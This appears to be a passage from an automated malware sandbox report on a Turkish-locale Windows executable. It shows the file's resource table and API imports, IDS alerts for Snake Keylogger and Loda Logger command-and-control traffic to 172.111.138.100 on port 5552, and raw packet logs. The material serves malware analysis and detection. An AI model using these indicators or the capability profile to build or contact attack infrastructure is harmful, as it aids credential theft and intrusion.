| RT_STRING | 0xb5274 | 0x3a4 | data | | | 0.40879828326180256 |
| RT_STRING | 0xb5618 | 0x3bc | data | | | 0.33472803347280333 |
| RT_STRING | 0xb59d4 | 0x2d4 | data | | | 0.4654696132596685 |
| RT_STRING | 0xb5ca8 | 0x334 | data | | | 0.42804878048780487 |
| RT_STRING | 0xb5fdc | 0x42c | data | | | 0.42602996254681647 |
| RT_STRING | 0xb6408 | 0x1f0 | data | | | 0.4213709677419355 |
| RT_STRING | 0xb65f8 | 0x1c0 | data | | | 0.44419642857142855 |
| RT_STRING | 0xb67b8 | 0xdc | data | | | 0.6 |
| RT_STRING | 0xb6894 | 0x320 | data | | | 0.45125 |
| RT_STRING | 0xb6bb4 | 0xd8 | data | | | 0.5879629629629629 |
| RT_STRING | 0xb6c8c | 0x118 | data | | | 0.5678571428571428 |
| RT_STRING | 0xb6da4 | 0x268 | data | | | 0.4707792207792208 |
| RT_STRING | 0xb700c | 0x3f8 | data | | | 0.37598425196850394 |
| RT_STRING | 0xb7404 | 0x378 | data | | | 0.41103603603603606 |
| RT_STRING | 0xb777c | 0x380 | data | | | 0.35379464285714285 |
| RT_STRING | 0xb7afc | 0x374 | data | | | 0.4061085972850679 |
| RT_STRING | 0xb7e70 | 0xe0 | data | | | 0.5535714285714286 |
| RT_STRING | 0xb7f50 | 0xbc | data | | | 0.526595744680851 |
| RT_STRING | 0xb800c | 0x368 | data | | | 0.40940366972477066 |
| RT_STRING | 0xb8374 | 0x3fc | data | | | 0.34901960784313724 |
| RT_STRING | 0xb8770 | 0x2fc | data | | | 0.36649214659685864 |
| RT_STRING | 0xb8a6c | 0x354 | data | | | 0.31572769953051644 |
| RT_RCDATA | 0xb8dc0 | 0x44 | data | | | 0.8676470588235294 |
| RT_RCDATA | 0xb8e04 | 0x10 | data | | | 1.5 |
| RT_RCDATA | 0xb8e14 | 0x15da00 | PE32 executable (GUI) Intel 80386, for MS Windows | | | 0.5394763946533203 |
| RT_RCDATA | 0x216814 | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665 |
| RT_RCDATA | 0x216818 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875 |
| RT_RCDATA | 0x21a418 | 0x64c | data | | | 0.5998759305210918 |
| RT_RCDATA | 0x21aa64 | 0x153 | Delphi compiled form 'TFormVir' | | | 0.7522123893805309 |
| RT_RCDATA | 0x21abb8 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957 |
| RT_GROUP_CURSOR | 0x21f38c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25 |
| RT_GROUP_CURSOR | 0x21f3a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25 |
| RT_GROUP_CURSOR | 0x21f3b4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x21f3c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x21f3dc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x21f3f0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x21f404 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_ICON | 0x21f418 | 0x14 | data | Turkish | Turkey | 1.1 |
| RT_VERSION | 0x21f42c | 0x304 | data | Turkish | Turkey | 0.42875647668393785 |

| DLL | Import |
|---|---|
| kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle |
| user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey |
| oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
| kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA |
| advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges |
| kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA |
| version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
| gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt |
| user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout |
| ole32.dll | CLSIDFromString |
| kernel32.dll | Sleep |
| oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit |
| ole32.dll | CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize |
| oleaut32.dll | GetErrorInfo, SysFreeString |
| comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create |
| shell32.dll | ShellExecuteExA, ExtractIconExW |
| wininet.dll | InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle |
| shell32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder |
                                                                                                                      advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                                      wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                                      netapi32.dllNetbios
Language of compilation system | Country where language is spoken
Turkish | Turkey
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T11:40:20.115020+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50146 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:20.115020+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50153 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:20.115020+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50147 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:20.115020+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 49876 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:20.115020+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50073 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:20.115020+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50150 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:20.115020+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 49971 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:20.115020+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50154 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:20.115020+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 49769 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:20.115020+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50139 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:37.786370+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.6 | 49751 | 69.42.215.252 | 80 | TCP
2024-12-30T11:40:38.133447+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49741 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:38.137980+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49742 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:38.873446+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 49769 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:39.112067+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49759 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:39.189594+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49760 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:40.089973+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49774 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:40.171848+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49777 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:41.075058+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49787 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:41.144474+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49788 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:41.819656+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49800 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:41.819674+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49799 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:43.017703+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49811 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:43.044161+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49812 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:43.992346+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49820 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:44.030374+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49823 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:44.971009+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49832 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:45.029995+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49833 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:45.835070+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49845 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:45.835091+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49846 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:46.814532+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49855 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:46.819390+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49854 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:47.796295+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49864 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:47.798664+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49862 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:48.309364+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.6 | 49876 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:48.309364+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 49876 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:40:48.846936+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49870 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:48.868177+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49871 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:49.845147+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49881 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:49.845167+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49880 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:50.824294+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49893 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:50.838760+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.6 | 49894 | 142.250.185.78 | 443 | TCP
2024-12-30T11:40:57.339980+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 49971 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:41:06.418992+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50073 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:41:15.471082+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50139 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:41:24.558784+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.6 | 50146 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:41:24.558784+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50146 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:41:33.611749+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50147 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:41:42.699043+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50150 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:41:51.761479+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50153 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:42:00.812107+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.6 | 50154 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:42:00.812107+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.6 | 50154 | 172.111.138.100 | 5552 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                      Dec 30, 2024 11:40:38.765892982 CET49762443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:38.791321993 CET44349759142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:38.799321890 CET44349761142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:38.807322979 CET44349762142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:38.824886084 CET44349760142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:38.824975967 CET49760443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:38.825654030 CET44349760142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:38.825710058 CET49760443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:38.831615925 CET49760443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:38.831621885 CET44349760142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:38.831856966 CET44349760142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:38.831950903 CET49760443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:38.833219051 CET49760443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:38.864600897 CET497695552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:40:38.869476080 CET555249769172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:38.873023987 CET497695552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:40:38.873445988 CET497695552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:40:38.878283978 CET555249769172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:38.879331112 CET44349760142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.112087965 CET44349759142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.112212896 CET49759443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.112226963 CET44349759142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.112319946 CET49759443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.112354040 CET49759443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.112380028 CET44349759142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.112448931 CET49759443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.114450932 CET49774443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.114485025 CET44349774142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.114609957 CET49774443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.118794918 CET49774443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.118804932 CET44349774142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.148230076 CET44349761142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.148293018 CET44349761142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.148355007 CET49761443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.148386002 CET44349761142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.148400068 CET49761443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.148400068 CET44349761142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.148427010 CET49761443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.148458958 CET49761443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.158792973 CET49761443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.158818960 CET44349761142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.159470081 CET49775443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.159481049 CET44349775142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.159555912 CET49775443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.159749031 CET49775443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.159754992 CET44349775142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.189604044 CET44349760142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.189677000 CET49760443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.190431118 CET49760443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.190468073 CET44349760142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.190610886 CET44349760142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.190666914 CET49760443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.190685987 CET49760443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.191189051 CET49777443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.191227913 CET44349777142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.191476107 CET49777443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.191982985 CET49777443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.191998005 CET44349777142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.313424110 CET44349762142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.313471079 CET44349762142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.313492060 CET49762443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.313530922 CET44349762142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.313548088 CET49762443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.313570023 CET49762443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.313575983 CET44349762142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.313596010 CET44349762142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.313615084 CET49762443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.313635111 CET49762443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.335932016 CET49762443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.335963964 CET44349762142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.339268923 CET49778443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.339318991 CET44349778142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.339740038 CET49778443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.340432882 CET49778443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:40:39.340455055 CET44349778142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.723193884 CET44349774142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:40:39.723407030 CET49774443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:40:39.726263046 CET44349774142.250.185.78192.168.2.6
